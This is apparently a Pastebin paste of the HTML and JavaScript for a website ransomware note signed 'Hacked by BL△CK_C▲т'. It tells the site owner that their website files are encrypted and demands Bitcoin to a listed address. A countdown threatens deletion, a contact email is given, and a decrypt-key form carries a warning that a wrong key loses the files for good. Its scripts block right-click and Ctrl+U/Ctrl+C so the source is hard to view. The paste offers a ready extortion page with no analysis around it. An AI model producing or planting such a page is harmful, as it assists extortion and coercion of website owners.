Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <title>Website Locked!</title>
- <head>
- <style type="text/css">
- a {
- color:#8080ff;
- }
- #kiri {
- float:left;
- }
- #kiri-gambar {
- padding-left:30px;
- padding-top:30px;
- }
- #isi {
- padding-left:50px;
- }
- #isi-content {
- background-color:white;
- width:65%;
- font-size:20px;
- text-align:left;
- margin-left:30%;
- padding-left:3px;
- padding-top:3px;
- padding-right:3px;
- padding-bottom:3px;
- }
- #isi-judul {
- font-size:40px;
- color:white;
- padding-right:250px;
- text-align:center;
- }
- #isi-window {
- text-align:left;
- }
- #isi-gambar {
- margin-left:30%;
- }
- #isi-kolom {
- float:left;
- padding-left:30px;
- font-size:20px;
- color:white;
- }
- input[type=text], select {
- width: 400px;
- margin: 8px 0;
- padding: 14px 20px;
- border: 1px solid #ccc;
- border-radius: 4px;
- box-sizing: border-box;
- }
- input[type=submit] {
- width: 175px;
- background-color: #4CAF50;
- color: white;
- padding: 16px 20px;
- margin: 8px 0;
- border: none;
- border-radius: 4px;
- cursor: pointer;
- }
- #sisa-waktu {
- font-family:"Palatino Linotype", "Book Antiqua", Palatino, serif;
- font-size:30px;
- padding-left:30px;
- padding-top:30px;
- animation: blink-animation 1s steps(5, start) infinite;
- -webkit-animation: blink-animation 1s steps(5, start) infinite;
- }
- #hacked {
- padding-top:115px;
- font-family:"Palatino Linotype", "Book Antiqua", Palatino, serif;
- color:white;
- width:25%;
- }
- @keyframes blink-animation {
- to {
- visibility: hidden;
- }
- }
- @-webkit-keyframes blink-animation {
- to {
- visibility: hidden;
- }
- }
- #timer {
- font-family:"Palatino Linotype", "Book Antiqua", Palatino, serif;
- font-size:25px;
- padding-left:30px;
- padding-top:none;
- color:white;
- }
- #waktu {
- border:3px;
- color:white;
- }
- #about {
- font-family:"Palatino Linotype", "Book Antiqua", Palatino, serif;
- font-size:20px;
- padding-left:30px;
- padding-top:100px;
- }
- #countdown {
- font-family: sans-serif;
- color: #fff;
- display: inline-block;
- text-align: center;
- font-size: 30px;
- background: #ff6600;
- font-weight: 100;
- width:100%;
- }
- </style>
- </head>
- <head>
- </head>
- <body style="background:#990000;border: 25px solid #e20733;border-radius:4px;box-sizing: border-box;">
- <div id="kiri">
- <div id="kiri-gambar"><img src="http://www.homelandsecureit.com/wp-content/uploads/2011/01/security-padlock.gif" height="200px" width="200px"></div>
- <script type = "text/javascript">
- var cday;
- var timeInSecs;
- var ticker;
- function getSeconds() {
- var now = new Date();
- var nowtime= now.getTime(); // time now in milliseconds
- var countdowntime = new Date(now.getFullYear(),now.getMonth(),now.getDate(),24,0,0); // 16 hrs = 4 pm
- // countdowntime - change time hh,mm,ss to whatever time required, e.g. 7,50,0 (0750)
- var dy = 5 ; // Friday (day 5) - change for other days 0-6
- var atime = countdowntime.getTime();
- var diff = parseInt((atime - nowtime)/1000); // positive if date is in future
- if (diff >0) {
- cday = dy - now.getDay();
- }
- else {
- cday = dy - now.getDay() -1;
- }
- if (cday < 0) { cday += 7; } // aleady passed countdown time, so go for next week
- if (diff <= 0) { diff += (86400 * 7) }
- startTimer (diff);
- }
- function startTimer(secs) {
- timeInSecs = parseInt(secs);
- ticker = setInterval("tick()",1000);
- tick(); // to start counter display right away
- }
- function tick() {
- var secs = timeInSecs;
- if (secs>0) {
- timeInSecs--;
- }
- else {
- clearInterval(ticker); // stop counting at zero
- getSeconds(); // and start all over again!
- }
- var days = Math.floor(secs/86400);
- secs %= 86400;
- var hours= Math.floor(secs/3600);
- secs %= 3600;
- var mins = Math.floor(secs/60);
- secs %= 60;
- var result = days +":";
- result += ((hours < 10 ) ? "0":"" ) + hours + ":" + ( (mins < 10) ? "0" : "" ) + mins
- + ":" + ( (secs < 10) ? "0":"" ) + secs + "";
- document.getElementById("countdown").innerHTML = result;
- }
- var isCtrl = false;
- document.onkeyup=function(e)
- {
- if(e.which == 17)
- isCtrl=false;
- }
- document.onkeydown=function(e)
- {
- if(e.which == 17)
- isCtrl=true;
- if((e.which == 85) || (e.which == 67) && (isCtrl == true))
- {
- return false;
- }
- }
- var isNS = (navigator.appName == "Netscape") ? 1 : 0;
- if(navigator.appName == "Netscape") document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
- function mischandler(){
- return false;
- }
- function mousehandler(e){
- var myevent = (isNS) ? e : event;
- var eventbutton = (isNS) ? myevent.which : myevent.button;
- if((eventbutton==2)||(eventbutton==3)) return false;
- }
- document.oncontextmenu = mischandler;
- document.onmousedown = mousehandler;
- document.onmouseup = mousehandler;
- </script>
- <div id="waktu">
- <div id="sisa-waktu">
- All files will be delete on :
- </div>
- <div id="timer">
- <body onload = "getSeconds()">
- <div id="CountDownLogo">
- <span id="title"</span>
- <br><br>
- <span id="countdown"> </span>
- </div>
- </div>
- </div>
- <div id="about">
- <a href="https://en.wikipedia.org/wiki/Bitcoin" target="_blank">About BitCoin</a><br><br>
- <a href="https://www.bitcoin.com/buy-bitcoin" target="_blank">How to buy BitCoin ?</a><br><br>
- <a href="mailto:rextor403@gmail.com"><b>Contact Us</b></a>
- </div>
- </div>
- <div id="isi">
- <br>
- <br>
- <div id="isi-judul">Ooops, your website have been encrypted!</div>
- <br>
- <br>
- <div id="isi-content">
- <div id="content-judul">
- <u><b>What happened to my website ?</u></b></style><br>
- </div>
- Your important website files are encrypted.
- Many of your .php, .css, .js, and other files are no longer accessible
- because they have been encrypted. Maybe you are busy looking for a way to
- recover your files, but do not waste your time! Nobody can decrypt your files
- without our special decryption service.
- <br>
- <br>
- <div id="content-judul">
- <u><b>Can i recover my website ?</u></b></style><br>
- </div>
- Sure, we guarantee that you can recover all your files safely and easily. But you have not enough time.
- You can decrypt all your website file safely, how ? You must pay with Bitcoin and Paypal (paypal must contact me).
- <br>
- <br>
- <div id="content-judul">
- <u><b>How do i pay ?</u></b></style><br>
- </div>
- Payment is accepted with Bitcoin only, we are not using Paypal, CC, etc. and if you want to pay via paypal contact me! [Contact Us], For more information
- please click [About BitCoin].
- For more information, click [How to buy BitCoin]
- And send the correct amount to the address specified in below
- After your payment, send payment receipt to email address [Contact Us], and we will send unlock key to you.
- <br>
- <br>
- <div id="content-judul">
- <u><b>Contact ?</u></b></style><br>
- </div>
- If you need our assistance, send a message by clicking [Contact Us]
- </div>
- <br>
- <div id="isi-window">
- <div id="isi-gambar"><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTKAnP6a0_qv1qIt-rHjDltkInvW1BSdoObHKRfpgPFF00DcCZp" align="left"></div>
- <div id="isi-kolom">
- Payment 1 BTC=</font><font color="yellow"> 37RGqjSKhGeEPk9PHp5yPKZ2b6DiAnq3UP</font><br>
- <form action="" method="post" style=" text-align: center;">
- <label><b><div id="judul" style="font-size:20px;font-family:Lucida Sans Unicode, Lucida Grande, sans-serif;">KEY : </b></label>
- <input type="text" name="key" class="inpute" placeholder="DECRYPT KEY">
- <select name="method" class="selecte" style="display:none;">
- <option value="2"><b>DECRYPT</b></option>
- </select>
- <input type="submit" name="submit" class="submite" value="Submit" />
- <div id="warning" style="font-size:13px;color:red;">DO NOT INPUT WRONG KEY, BECAUSE IT MAKES ALL YOUR FILE DATA PERMANENTLY LOST!!</div>
- </form>
- </div>
- </div>
- <br>
- <br>
- <center>
- <div id="hacked"><marquee>Hacked by BL△CK_C▲т</marquee>
- <br>
- <iframe width="560" height="315" src="https://www.youtube.com/embed/LApS9G22cIU?autoplay=1" frameborder="0" allowfullscreen style="display:none;"></iframe>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement